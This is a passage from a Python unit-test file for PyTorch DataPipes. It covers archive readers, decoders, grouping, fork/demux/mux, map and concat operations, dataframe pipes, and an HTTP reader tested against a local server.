self.assertEqual(len(data_refs), len(self.temp_files))
for data_ref, temp_file in zip(data_refs, self.temp_files):
self.assertEqual(os.path.basename(data_ref[0]), os.path.basename(temp_file))
with open(temp_file, 'rb') as f:
self.assertEqual(data_ref[1].read(), f.read())
data_ref[1].close()
# Test Case: reset the DataPipe after reading part of it
n_elements_before_reset = 1
res_before_reset, res_after_reset = reset_after_n_next_calls(datapipe3, n_elements_before_reset)
# Check result accumulated before reset
self.assertEqual(len(res_before_reset), n_elements_before_reset)
for ele_before_reset, temp_file in zip(res_before_reset, self.temp_files):
self.assertEqual(os.path.basename(ele_before_reset[0]), os.path.basename(temp_file))
with open(temp_file, 'rb') as f:
self.assertEqual(ele_before_reset[1].read(), f.read())
ele_before_reset[1].close()
# Check result accumulated after reset
self.assertEqual(len(res_after_reset), len(self.temp_files))
for ele_after_reset, temp_file in zip(res_after_reset, self.temp_files):
self.assertEqual(os.path.basename(ele_after_reset[0]), os.path.basename(temp_file))
with open(temp_file, 'rb') as f:
self.assertEqual(ele_after_reset[1].read(), f.read())
ele_after_reset[1].close()
# This test throws a warning because data_stream in side ZipArchiveReader cannot be closed
# due to the way zipfiles.open() is implemented
def test_readfilesfromzip_iterable_datapipe(self):
temp_dir = self.temp_dir.name
temp_zipfile_pathname = os.path.join(temp_dir, "test_zip.zip")
with zipfile.ZipFile(temp_zipfile_pathname, 'w') as myzip:
myzip.write(self.temp_files[0])
myzip.write(self.temp_files[1])
myzip.write(self.temp_files[2])
datapipe1 = dp.iter.FileLister(temp_dir, '*.zip')
datapipe2 = dp.iter.FileLoader(datapipe1)
datapipe3 = dp.iter.ZipArchiveReader(datapipe2)
# Test Case: read extracted files before reaching the end of the zipfile
for rec, temp_file in itertools.zip_longest(datapipe3, self.temp_files):
self.assertTrue(rec is not None and temp_file is not None)
self.assertEqual(os.path.basename(rec[0]), os.path.basename(temp_file))
with open(temp_file, 'rb') as f:
self.assertEqual(rec[1].read(), f.read())
rec[1].close()
# Test Case: read extracted files after reaching the end of the zipile
data_refs = list(datapipe3)
self.assertEqual(len(data_refs), len(self.temp_files))
for data_ref, temp_file in zip(data_refs, self.temp_files):
self.assertEqual(os.path.basename(data_ref[0]), os.path.basename(temp_file))
with open(temp_file, 'rb') as f:
self.assertEqual(data_ref[1].read(), f.read())
data_ref[1].close()
# Test Case: reset the DataPipe after reading part of it
n_elements_before_reset = 1
res_before_reset, res_after_reset = reset_after_n_next_calls(datapipe3, n_elements_before_reset)
# Check the results accumulated before reset
self.assertEqual(len(res_before_reset), n_elements_before_reset)
for ele_before_reset, temp_file in zip(res_before_reset, self.temp_files):
self.assertEqual(os.path.basename(ele_before_reset[0]), os.path.basename(temp_file))
with open(temp_file, 'rb') as f:
self.assertEqual(ele_before_reset[1].read(), f.read())
ele_before_reset[1].close()
# Check the results accumulated after reset
self.assertEqual(len(res_after_reset), len(self.temp_files))
for ele_after_reset, temp_file in zip(res_after_reset, self.temp_files):
self.assertEqual(os.path.basename(ele_after_reset[0]), os.path.basename(temp_file))
with open(temp_file, 'rb') as f:
self.assertEqual(ele_after_reset[1].read(), f.read())
ele_after_reset[1].close()
def test_routeddecoder_iterable_datapipe(self):
temp_dir = self.temp_dir.name
temp_pngfile_pathname = os.path.join(temp_dir, "test_png.png")
png_data = np.array([[[1., 0., 0.], [1., 0., 0.]], [[1., 0., 0.], [1., 0., 0.]]], dtype=np.single)
np.save(temp_pngfile_pathname, png_data)
datapipe1 = dp.iter.FileLister(temp_dir, ['*.png', '*.txt'])
datapipe2 = dp.iter.FileLoader(datapipe1)
def _png_decoder(extension, data):
if extension != 'png':
return None
return np.load(data)
def _helper(prior_dp, dp, channel_first=False):
# Byte stream is not closed
for inp in prior_dp:
self.assertFalse(inp[1].closed)
for inp, rec in zip(prior_dp, dp):
ext = os.path.splitext(rec[0])[1]
if ext == '.png':
expected = np.array([[[1., 0., 0.], [1., 0., 0.]], [[1., 0., 0.], [1., 0., 0.]]], dtype=np.single)
if channel_first:
expected = expected.transpose(2, 0, 1)
self.assertEqual(rec[1], expected)
else:
with open(rec[0], 'rb') as f:
self.assertEqual(rec[1], f.read().decode('utf-8'))
# Corresponding byte stream is closed by Decoder
self.assertTrue(inp[1].closed)
cached = list(datapipe2)
datapipe3 = dp.iter.RoutedDecoder(cached, _png_decoder)
datapipe3.add_handler(decoder_basichandlers)
_helper(cached, datapipe3)
cached = list(datapipe2)
datapipe4 = dp.iter.RoutedDecoder(cached, decoder_basichandlers)
datapipe4.add_handler(_png_decoder)
_helper(cached, datapipe4, channel_first=True)
def test_groupby_iterable_datapipe(self):
temp_dir = self.temp_dir.name
temp_tarfile_pathname = os.path.join(temp_dir, "test_tar.tar")
file_list = [
"a.png", "b.png", "c.json", "a.json", "c.png", "b.json", "d.png",
"d.json", "e.png", "f.json", "g.png", "f.png", "g.json", "e.json",
"h.txt", "h.json"]
with tarfile.open(temp_tarfile_pathname, "w:gz") as tar:
for file_name in file_list:
file_pathname = os.path.join(temp_dir, file_name)
with open(file_pathname, 'w') as f:
f.write('12345abcde')
tar.add(file_pathname)
datapipe1 = dp.iter.FileLister(temp_dir, '*.tar')
datapipe2 = dp.iter.FileLoader(datapipe1)
datapipe3 = dp.iter.TarArchiveReader(datapipe2)
def group_fn(data):
filepath, _ = data
return os.path.basename(filepath).split(".")[0]
datapipe4 = dp.iter.Grouper(datapipe3, group_key_fn=group_fn, group_size=2)
def order_fn(data):
data.sort(key=lambda f: f[0], reverse=True)
return data
datapipe5 = dp.iter.Mapper(datapipe4, fn=order_fn) # type: ignore[var-annotated]
expected_result = [
("a.png", "a.json"), ("c.png", "c.json"), ("b.png", "b.json"), ("d.png", "d.json"),
("f.png", "f.json"), ("g.png", "g.json"), ("e.png", "e.json"), ("h.txt", "h.json")]
count = 0
for rec, expected in zip(datapipe5, expected_result):
count = count + 1
self.assertEqual(os.path.basename(rec[0][0]), expected[0])
self.assertEqual(os.path.basename(rec[1][0]), expected[1])
for i in [0, 1]:
self.assertEqual(rec[i][1].read(), b'12345abcde')
rec[i][1].close()
self.assertEqual(count, 8)
def test_demux_mux_datapipe(self):
numbers = NumbersDataset(10)
n1, n2 = numbers.demux(2, lambda x: x % 2)
self.assertEqual([0, 2, 4, 6, 8], list(n1))
self.assertEqual([1, 3, 5, 7, 9], list(n2))
numbers = NumbersDataset(10)
n1, n2, n3 = numbers.demux(3, lambda x: x % 3)
n = n1.mux(n2, n3)
self.assertEqual(list(range(10)), list(n))
# Test Case: Uneven DataPipes
source_numbers = list(range(0, 10)) + [10, 12]
numbers_dp = dp.iter.IterableWrapper(source_numbers)
n1, n2 = numbers_dp.demux(2, lambda x: x % 2)
self.assertEqual([0, 2, 4, 6, 8, 10, 12], list(n1))
self.assertEqual([1, 3, 5, 7, 9], list(n2))
n = n1.mux(n2)
self.assertEqual(source_numbers, list(n))
@suppress_warnings # Suppress warning for lambda fn
def test_map_with_col_file_handle_datapipe(self):
temp_dir = self.temp_dir.name
datapipe1 = dp.iter.FileLister(temp_dir, '')
datapipe2 = dp.iter.FileLoader(datapipe1)
def _helper(datapipe):
dp1 = datapipe.map(lambda x: x.read(), input_col=1)
dp2 = datapipe.map(lambda x: (x[0], x[1].read()))
self.assertEqual(list(dp1), list(dp2))
# tuple
_helper(datapipe2)
# list
datapipe3 = datapipe2.map(lambda x: list(x))
_helper(datapipe3)
class TestDataFramesPipes(TestCase):
"""
Most of test will fail if pandas instaled, but no dill available.
Need to rework them to avoid multiple skips.
"""
def _get_datapipe(self, range=10, dataframe_size=7):
return NumbersDataset(range) \
.map(lambda i: (i, i % 3))
def _get_dataframes_pipe(self, range=10, dataframe_size=7):
return NumbersDataset(range) \
.map(lambda i: (i, i % 3)) \
._to_dataframes_pipe(
columns=['i', 'j'],
dataframe_size=dataframe_size)
@skipIfNoDataFrames
@skipIfNoDill # TODO(VitalyFedyunin): Decouple tests from dill by avoiding lambdas in map
def test_capture(self):
dp_numbers = self._get_datapipe().map(lambda x: (x[0], x[1], x[1] + 3 * x[0]))
df_numbers = self._get_dataframes_pipe()
df_numbers['k'] = df_numbers['j'] + df_numbers.i * 3
self.assertEqual(list(dp_numbers), list(df_numbers))
@skipIfNoDataFrames
@skipIfNoDill
def test_shuffle(self):
# With non-zero (but extremely low) probability (when shuffle do nothing),
# this test fails, so feel free to restart
df_numbers = self._get_dataframes_pipe(range=1000).shuffle()
dp_numbers = self._get_datapipe(range=1000)
df_result = [tuple(item) for item in df_numbers]
self.assertNotEqual(list(dp_numbers), df_result)
self.assertEqual(list(dp_numbers), sorted(df_result))
@skipIfNoDataFrames
@skipIfNoDill
def test_batch(self):
df_numbers = self._get_dataframes_pipe(range=100).batch(8)
df_numbers_list = list(df_numbers)
last_batch = df_numbers_list[-1]
self.assertEqual(4, len(last_batch))
unpacked_batch = [tuple(row) for row in last_batch]
self.assertEqual([(96, 0), (97, 1), (98, 2), (99, 0)], unpacked_batch)
@skipIfNoDataFrames
@skipIfNoDill
def test_unbatch(self):
df_numbers = self._get_dataframes_pipe(range=100).batch(8).batch(3)
dp_numbers = self._get_datapipe(range=100)
self.assertEqual(list(dp_numbers), list(df_numbers.unbatch(2)))
@skipIfNoDataFrames
@skipIfNoDill
def test_filter(self):
df_numbers = self._get_dataframes_pipe(range=10).filter(lambda x: x.i > 5)
self.assertEqual([(6, 0), (7, 1), (8, 2), (9, 0)], list(df_numbers))
class FileLoggerSimpleHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
def __init__(self, *args, logfile=None, **kwargs):
self.__loggerHandle = None
if logfile is not None:
self.__loggerHandle = open(logfile, 'a+')
super().__init__(*args, **kwargs)
def log_message(self, format, *args):
if self.__loggerHandle is not None:
self.__loggerHandle.write("%s - - [%s] %s\n" %
(self.address_string(),
self.log_date_time_string(),
format % args))
return
def finish(self):
if self.__loggerHandle is not None:
self.__loggerHandle.close()
super().finish()
def setUpLocalServerInThread():
try:
Handler = partial(FileLoggerSimpleHTTPRequestHandler, logfile=None)
socketserver.TCPServer.allow_reuse_address = True
server = socketserver.TCPServer(("", 0), Handler)
server_addr = "{host}:{port}".format(host=server.server_address[0], port=server.server_address[1])
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
# Wait a bit for the server to come up
time.sleep(3)
return (server_thread, server_addr, server)
except Exception:
raise
def create_temp_files_for_serving(tmp_dir, file_count, file_size,
file_url_template):
furl_local_file = os.path.join(tmp_dir, "urls_list")
with open(furl_local_file, 'w') as fsum:
for i in range(0, file_count):
f = os.path.join(tmp_dir, "webfile_test_{num}.data".format(num=i))
write_chunk = 1024 * 1024 * 16
rmn_size = file_size
while rmn_size > 0:
with open(f, 'ab+') as fout:
fout.write(os.urandom(min(rmn_size, write_chunk)))
rmn_size = rmn_size - min(rmn_size, write_chunk)
fsum.write(file_url_template.format(num=i))
class TestIterableDataPipeHttp(TestCase):
__server_thread: threading.Thread
__server_addr: str
__server: socketserver.TCPServer
@classmethod
def setUpClass(cls):
try:
(cls.__server_thread, cls.__server_addr,
cls.__server) = setUpLocalServerInThread()
except Exception as e:
warnings.warn("TestIterableDataPipeHttp could\
not set up due to {0}".format(str(e)))
@classmethod
def tearDownClass(cls):
try:
cls.__server.shutdown()
cls.__server_thread.join(timeout=15)
except Exception as e:
warnings.warn("TestIterableDataPipeHttp could\
not tear down (clean up temp directory or terminate\
local server) due to {0}".format(str(e)))
def _http_test_base(self, test_file_size, test_file_count, timeout=None,
chunk=None):
def _get_data_from_tuple_fn(data, *args, **kwargs):
return data[args[0]]
with tempfile.TemporaryDirectory(dir=os.getcwd()) as tmpdir:
# create tmp dir and files for test
base_tmp_dir = os.path.basename(os.path.normpath(tmpdir))
file_url_template = ("http://{server_addr}/{tmp_dir}/"
"/webfile_test_{num}.data\n")\
.format(server_addr=self.__server_addr, tmp_dir=base_tmp_dir,
num='{num}')
create_temp_files_for_serving(tmpdir, test_file_count,
test_file_size, file_url_template)
datapipe_dir_f = dp.iter.FileLister(tmpdir, '*_list')
datapipe_stream = dp.iter.FileLoader(datapipe_dir_f)
datapipe_f_lines = dp.iter.LineReader(datapipe_stream)
datapipe_line_url: IterDataPipe[str] = \
dp.iter.Mapper(datapipe_f_lines, _get_data_from_tuple_fn, (1,))
datapipe_http = dp.iter.HttpReader(datapipe_line_url,
timeout=timeout)
datapipe_tob = dp.iter.StreamReader(datapipe_http, chunk=chunk)
for (url, data) in datapipe_tob:
self.assertGreater(len(url), 0)
self.assertRegex(url, r'^http://.+\d+.data$')
if chunk is not None:
self.assertEqual(len(data), chunk)
else:
self.assertEqual(len(data), test_file_size)
@unittest.skip("Stress test on large amount of files skipped\
due to the CI timing constraint.")
def test_stress_http_reader_iterable_datapipes(self):
test_file_size = 10
# STATS: It takes about 5 hours to stress test 16 * 1024 * 1024
# files locally
test_file_count = 1024
self._http_test_base(test_file_size, test_file_count)
@unittest.skip("Test on the very large file skipped\
due to the CI timing constraint.")
def test_large_files_http_reader_iterable_datapipes(self):
# STATS: It takes about 11 mins to test a large file of 64GB locally
test_file_size = 1024 * 1024 * 128
test_file_count = 1
timeout = 30
chunk = 1024 * 1024 * 8
self._http_test_base(test_file_size, test_file_count, timeout=timeout,
chunk=chunk)
class IDP_NoLen(IterDataPipe):
def __init__(self, input_dp):
super().__init__()
self.input_dp = input_dp
# Prevent in-place modification
def __iter__(self):
input_dp = self.input_dp if isinstance(self.input_dp, IterDataPipe) else copy.deepcopy(self.input_dp)
for i in input_dp:
yield i
def _fake_fn(data, *args, **kwargs):
return data
def _fake_filter_fn(data, *args, **kwargs):
return data >= 5
def _worker_init_fn(worker_id):
random.seed(123)
class TestFunctionalIterDataPipe(TestCase):
# TODO(VitalyFedyunin): If dill installed this test fails
def _test_picklable(self):
arr = range(10)
picklable_datapipes: List[Tuple[Type[IterDataPipe], IterDataPipe, Tuple, Dict[str, Any]]] = [
(dp.iter.Mapper, dp.iter.IterableWrapper(arr), (), {}),
(dp.iter.Mapper, dp.iter.IterableWrapper(arr), (_fake_fn, (0, ), {'test': True}), {}),
(dp.iter.Collator, dp.iter.IterableWrapper(arr), (), {}),
(dp.iter.Collator, dp.iter.IterableWrapper(arr), (_fake_fn, (0, ), {'test': True}), {}),
(dp.iter.Filter, dp.iter.IterableWrapper(arr), (_fake_filter_fn, (0, ), {'test': True}), {}),
]
for dpipe, input_dp, dp_args, dp_kwargs in picklable_datapipes:
p = pickle.dumps(dpipe(input_dp, *dp_args, **dp_kwargs)) # type: ignore[call-arg]
unpicklable_datapipes: List[Tuple[Type[IterDataPipe], IterDataPipe, Tuple, Dict[str, Any]]] = [
(dp.iter.Mapper, dp.iter.IterableWrapper(arr), (lambda x: x, ), {}),
(dp.iter.Collator, dp.iter.IterableWrapper(arr), (lambda x: x, ), {}),
(dp.iter.Filter, dp.iter.IterableWrapper(arr), (lambda x: x >= 5, ), {}),
]
for dpipe, input_dp, dp_args, dp_kwargs in unpicklable_datapipes:
with warnings.catch_warnings(record=True) as wa:
datapipe = dpipe(input_dp, *dp_args, **dp_kwargs) # type: ignore[call-arg]
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"^Lambda function is not supported for pickle")
with self.assertRaises(AttributeError):
p = pickle.dumps(datapipe)
def test_iterable_wrapper_datapipe(self):
input_ls = list(range(10))
input_dp = dp.iter.IterableWrapper(input_ls)
# Functional Test: values are unchanged and in the same order
self.assertEqual(input_ls, list(input_dp))
# Functional Test: deep copy by default when an iterator is initialized (first element is read)
it = iter(input_dp)
self.assertEqual(0, next(it)) # The deep copy only happens when the first element is read
input_ls.append(50)
self.assertEqual(list(range(1, 10)), list(it))
# Functional Test: shallow copy
input_ls2 = [1, 2, 3]
input_dp_shallow = dp.iter.IterableWrapper(input_ls2, deepcopy=False)
input_ls2.append(10)
self.assertEqual([1, 2, 3, 10], list(input_dp_shallow))
# Reset Test: reset the DataPipe
input_ls = list(range(10))
input_dp = dp.iter.IterableWrapper(input_ls)
n_elements_before_reset = 5
res_before_reset, res_after_reset = reset_after_n_next_calls(input_dp, n_elements_before_reset)
self.assertEqual(input_ls[:n_elements_before_reset], res_before_reset)
self.assertEqual(input_ls, res_after_reset)
# __len__ Test: inherits length from sequence
self.assertEqual(len(input_ls), len(input_dp))
def test_concat_datapipe(self):
input_dp1 = dp.iter.IterableWrapper(range(10))
input_dp2 = dp.iter.IterableWrapper(range(5))
with self.assertRaisesRegex(ValueError, r"Expected at least one DataPipe"):
dp.iter.Concater()
with self.assertRaisesRegex(TypeError, r"Expected all inputs to be `IterDataPipe`"):
dp.iter.Concater(input_dp1, ()) # type: ignore[arg-type]
concat_dp = input_dp1.concat(input_dp2)
self.assertEqual(len(concat_dp), 15)
self.assertEqual(list(concat_dp), list(range(10)) + list(range(5)))
# Test Reset
self.assertEqual(list(concat_dp), list(range(10)) + list(range(5)))
input_dp_nl = IDP_NoLen(range(5))
concat_dp = input_dp1.concat(input_dp_nl)
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(concat_dp)
self.assertEqual(list(concat_dp), list(range(10)) + list(range(5)))
def test_fork_datapipe(self):
input_dp = dp.iter.IterableWrapper(range(10))
with self.assertRaises(ValueError):
input_dp.fork(num_instances=0)
dp1 = input_dp.fork(num_instances=1)
self.assertEqual(dp1, input_dp)
# Test Case: making sure all child DataPipe shares the same reference
dp1, dp2, dp3 = input_dp.fork(num_instances=3)
self.assertTrue(all(n1 is n2 and n1 is n3 for n1, n2, n3 in zip(dp1, dp2, dp3)))
# Test Case: one child DataPipe yields all value at a time
output1, output2, output3 = list(dp1), list(dp2), list(dp3)
self.assertEqual(list(range(10)), output1)
self.assertEqual(list(range(10)), output2)
self.assertEqual(list(range(10)), output3)
# Test Case: two child DataPipes yield value together
dp1, dp2 = input_dp.fork(num_instances=2)
output = []
for n1, n2 in zip(dp1, dp2):
output.append((n1, n2))
self.assertEqual([(i, i) for i in range(10)], output)
# Test Case: one child DataPipe yields all value first, but buffer_size = 5 being too small
dp1, dp2 = input_dp.fork(num_instances=2, buffer_size=5)
it1 = iter(dp1)
for _ in range(5):
next(it1)
with self.assertRaises(BufferError):
next(it1)
with self.assertRaises(BufferError):
list(dp2)
# Test Case: one child DataPipe yields all value first with unlimited buffer
with warnings.catch_warnings(record=True) as wa:
dp1, dp2 = input_dp.fork(num_instances=2, buffer_size=-1)
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"Unlimited buffer size is set")
l1, l2 = list(dp1), list(dp2)
for d1, d2 in zip(l1, l2):
self.assertEqual(d1, d2)
# Test Case: two child DataPipes yield value together with buffer size 1
dp1, dp2 = input_dp.fork(num_instances=2, buffer_size=1)
output = []
for n1, n2 in zip(dp1, dp2):
output.append((n1, n2))
self.assertEqual([(i, i) for i in range(10)], output)
# Test Case: make sure logic related to slowest_ptr is working properly
dp1, dp2, dp3 = input_dp.fork(num_instances=3)
output1, output2 , output3 = [], [], []
for i, (n1, n2) in enumerate(zip(dp1, dp2)):
output1.append(n1)
output2.append(n2)
if i == 4: # yield all of dp3 when halfway through dp1, dp2
output3 = list(dp3)
break
self.assertEqual(list(range(5)), output1)
self.assertEqual(list(range(5)), output2)
self.assertEqual(list(range(10)), output3)
# Test Case: DataPipe doesn't reset if this pipe hasn't been read
dp1, dp2 = input_dp.fork(num_instances=2)
i1, i2 = iter(dp1), iter(dp2)
output2 = []
for i, n2 in enumerate(i2):
output2.append(n2)
if i == 4:
i1 = iter(dp1) # Doesn't reset because i1 hasn't been read
self.assertEqual(list(range(10)), output2)
# Test Case: DataPipe reset when some of it have been read
dp1, dp2 = input_dp.fork(num_instances=2)
i1, i2 = iter(dp1), iter(dp2)
output1, output2 = [], []
for i, (n1, n2) in enumerate(zip(i1, i2)):
output1.append(n1)
output2.append(n2)
if i == 4:
with warnings.catch_warnings(record=True) as wa:
i1 = iter(dp1) # Reset both all child DataPipe
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"Some child DataPipes are not exhausted")
self.assertEqual(list(range(5)) + list(range(10)), output1)
self.assertEqual(list(range(5)) + list(range(10)), output2)
# Test Case: DataPipe reset, even when some other child DataPipes are not read
dp1, dp2, dp3 = input_dp.fork(num_instances=3)
output1, output2 = list(dp1), list(dp2)
self.assertEqual(list(range(10)), output1)
self.assertEqual(list(range(10)), output2)
with warnings.catch_warnings(record=True) as wa:
self.assertEqual(list(range(10)), list(dp1)) # Resets even though dp3 has not been read
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"Some child DataPipes are not exhausted")
output3 = []
for i, n3 in enumerate(dp3):
output3.append(n3)
if i == 4:
with warnings.catch_warnings(record=True) as wa:
output1 = list(dp1) # Resets even though dp3 is only partially read
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"Some child DataPipes are not exhausted")
self.assertEqual(list(range(5)), output3)
self.assertEqual(list(range(10)), output1)
break
self.assertEqual(list(range(10)), list(dp3)) # dp3 has to read from the start again
# Test Case: Each DataPipe inherits the source datapipe's length
dp1, dp2, dp3 = input_dp.fork(num_instances=3)
self.assertEqual(len(input_dp), len(dp1))
self.assertEqual(len(input_dp), len(dp2))
self.assertEqual(len(input_dp), len(dp3))
# Pickle Test:
dp1, dp2, dp3 = input_dp.fork(num_instances=3)
traverse(dp1) # This should not raise any error
for _ in zip(dp1, dp2, dp3):
pass
traverse(dp2) # This should not raise any error either
def test_mux_datapipe(self):
# Functional Test: Elements are yielded one at a time from each DataPipe, until they are all exhausted
input_dp1 = dp.iter.IterableWrapper(range(4))
input_dp2 = dp.iter.IterableWrapper(range(4, 8))
input_dp3 = dp.iter.IterableWrapper(range(8, 12))
output_dp = input_dp1.mux(input_dp2, input_dp3)
expected_output = [0, 4, 8, 1, 5, 9, 2, 6, 10, 3, 7, 11]
self.assertEqual(len(expected_output), len(output_dp))
self.assertEqual(expected_output, list(output_dp))
# Functional Test: Uneven input Data Pipes
input_dp1 = dp.iter.IterableWrapper([1, 2, 3, 4])
input_dp2 = dp.iter.IterableWrapper([10])
input_dp3 = dp.iter.IterableWrapper([100, 200, 300])
output_dp = input_dp1.mux(input_dp2, input_dp3)
expected_output = [1, 10, 100, 2, 200, 3, 300, 4]
self.assertEqual(len(expected_output), len(output_dp))
self.assertEqual(expected_output, list(output_dp))
# Functional Test: Empty Data Pipe
input_dp1 = dp.iter.IterableWrapper([0, 1, 2, 3])
input_dp2 = dp.iter.IterableWrapper([])
output_dp = input_dp1.mux(input_dp2)
self.assertEqual(len(input_dp1), len(output_dp))
self.assertEqual(list(input_dp1), list(output_dp))
# __len__ Test: raises TypeError when __len__ is called and an input doesn't have __len__
input_dp1 = dp.iter.IterableWrapper(range(10))
input_dp_no_len = IDP_NoLen(range(10))
output_dp = input_dp1.mux(input_dp_no_len)
with self.assertRaises(TypeError):
len(output_dp)
def test_demux_datapipe(self):
input_dp = dp.iter.IterableWrapper(range(10))
with self.assertRaises(ValueError):
input_dp.demux(num_instances=0, classifier_fn=lambda x: 0)
# Test Case: split into 2 DataPipes and output them one at a time
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2)
output1, output2 = list(dp1), list(dp2)
self.assertEqual(list(range(0, 10, 2)), output1)
self.assertEqual(list(range(1, 10, 2)), output2)
# Test Case: split into 2 DataPipes and output them together
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2)
output = []
for n1, n2 in zip(dp1, dp2):
output.append((n1, n2))
self.assertEqual([(i, i + 1) for i in range(0, 10, 2)], output)
# Test Case: values of the same classification are lumped together, and buffer_size = 3 being too small
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: 0 if x >= 5 else 1, buffer_size=4)
it1 = iter(dp1)
with self.assertRaises(BufferError):
next(it1) # Buffer raises because first 5 elements all belong to the a different child
with self.assertRaises(BufferError):
list(dp2)
# Test Case: values of the same classification are lumped together, and buffer_size = 5 is just enough
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: 0 if x >= 5 else 1, buffer_size=5)
output1, output2 = list(dp1), list(dp2)
self.assertEqual(list(range(5, 10)), output1)
self.assertEqual(list(range(0, 5)), output2)
# Test Case: values of the same classification are lumped together, and unlimited buffer
with warnings.catch_warnings(record=True) as wa:
dp1, dp2 = input_dp.demux(
num_instances=2,
classifier_fn=lambda x: 0 if x >= 5 else 1,
buffer_size=-1
)
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"Unlimited buffer size is set")
output1, output2 = list(dp1), list(dp2)
self.assertEqual(list(range(5, 10)), output1)
self.assertEqual(list(range(0, 5)), output2)
# Test Case: classifer returns a value outside of [0, num_instance - 1]
dp0 = input_dp.demux(num_instances=1, classifier_fn=lambda x: x % 2)
it = iter(dp0[0])
with self.assertRaises(ValueError):
next(it)
next(it)
# Test Case: DataPipe doesn't reset when it has not been read
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2)
i1 = iter(dp1)
output2 = []
i = 0
for i, n2 in enumerate(dp2):
output2.append(n2)
if i == 4:
i1 = iter(dp1)
self.assertEqual(list(range(1, 10, 2)), output2)
# Test Case: DataPipe reset when some of it has been read
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2)
output1, output2 = [], []
for n1, n2 in zip(dp1, dp2):
output1.append(n1)
output2.append(n2)
if n1 == 4:
break
with warnings.catch_warnings(record=True) as wa:
i1 = iter(dp1) # Reset all child DataPipes
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"Some child DataPipes are not exhausted")
for n1, n2 in zip(dp1, dp2):
output1.append(n1)
output2.append(n2)
self.assertEqual([0, 2, 4] + list(range(0, 10, 2)), output1)
self.assertEqual([1, 3, 5] + list(range(1, 10, 2)), output2)
# Test Case: DataPipe reset, even when not all child DataPipes are exhausted
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2)
output1 = list(dp1)
self.assertEqual(list(range(0, 10, 2)), output1)
with warnings.catch_warnings(record=True) as wa:
self.assertEqual(list(range(0, 10, 2)), list(dp1)) # Reset even when dp2 is not read
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"Some child DataPipes are not exhausted")
output2 = []
for i, n2 in enumerate(dp2):
output2.append(n2)
if i == 1:
self.assertEqual(list(range(1, 5, 2)), output2)
with warnings.catch_warnings(record=True) as wa:
self.assertEqual(list(range(0, 10, 2)), list(dp1)) # Can reset even when dp2 is partially read
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"Some child DataPipes are not exhausted")
break
output2 = list(dp2) # output2 has to read from beginning again
self.assertEqual(list(range(1, 10, 2)), output2)
# Test Case: drop_none = True
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2 if x % 5 != 0 else None,
drop_none=True)
self.assertEqual([2, 4, 6, 8], list(dp1))
self.assertEqual([1, 3, 7, 9], list(dp2))
# Test Case: drop_none = False
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2 if x % 5 != 0 else None,
drop_none=False)
it1 = iter(dp1)
with self.assertRaises(ValueError):
next(it1)
# Test Case: __len__ not implemented
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2)
with self.assertRaises(TypeError):
len(dp1) # It is not implemented as we do not know length for each child in advance
with self.assertRaises(TypeError):
len(dp2)
# Pickle Test:
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=odd_or_even)
traverse(dp1) # This should not raise any error
for _ in zip(dp1, dp2):
pass
traverse(dp2) # This should not raise any error either
@suppress_warnings # Suppress warning for lambda fn
def test_map_datapipe(self):
input_dp = dp.iter.IterableWrapper(range(10))
def fn(item, dtype=torch.float, *, sum=False):
data = torch.tensor(item, dtype=dtype)
return data if not sum else data.sum()
map_dp = input_dp.map(fn)
self.assertEqual(len(input_dp), len(map_dp))
for x, y in zip(map_dp, input_dp):
self.assertEqual(x, torch.tensor(y, dtype=torch.float))
map_dp = input_dp.map(fn=fn, fn_args=(torch.int, ), fn_kwargs={'sum': True})
self.assertEqual(len(input_dp), len(map_dp))
for x, y in zip(map_dp, input_dp):
self.assertEqual(x, torch.tensor(y, dtype=torch.int).sum())
from functools import partial
map_dp = input_dp.map(partial(fn, dtype=torch.int, sum=True))
self.assertEqual(len(input_dp), len(map_dp))
for x, y in zip(map_dp, input_dp):
self.assertEqual(x, torch.tensor(y, dtype=torch.int).sum())
input_dp_nl = IDP_NoLen(range(10))
map_dp_nl = input_dp_nl.map(lambda x: x)
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(map_dp_nl)
for x, y in zip(map_dp_nl, input_dp_nl):
self.assertEqual(x, torch.tensor(y, dtype=torch.float))
@suppress_warnings # Suppress warning for lambda fn
def test_map_tuple_list_with_col_datapipe(self):
def fn_11(d):
return -d
def fn_1n(d):
return -d, d
def fn_n1(d0, d1):
return d0 + d1
def fn_nn(d0, d1):
return -d0, -d1, d0 + d1
def _helper(ref_fn, fn, input_col=None, output_col=None):
for constr in (list, tuple):
datapipe = dp.iter.IterableWrapper([constr((0, 1, 2)), constr((3, 4, 5)), constr((6, 7, 8))])
res_dp = datapipe.map(fn, input_col, output_col)
ref_dp = datapipe.map(ref_fn)
self.assertEqual(list(res_dp), list(ref_dp))
# Reset
self.assertEqual(list(res_dp), list(ref_dp))
# Replacing with one input column and default output column
_helper(lambda data: (data[0], -data[1], data[2]), fn_11, 1)
_helper(lambda data: (data[0], (-data[1], data[1]), data[2]), fn_1n, 1)
# The index of input column is out of range
with self.assertRaises(IndexError):
_helper(None, fn_1n, 3)
# Unmatched input columns with fn arguments
with self.assertRaises(TypeError):
_helper(None, fn_n1, 1)
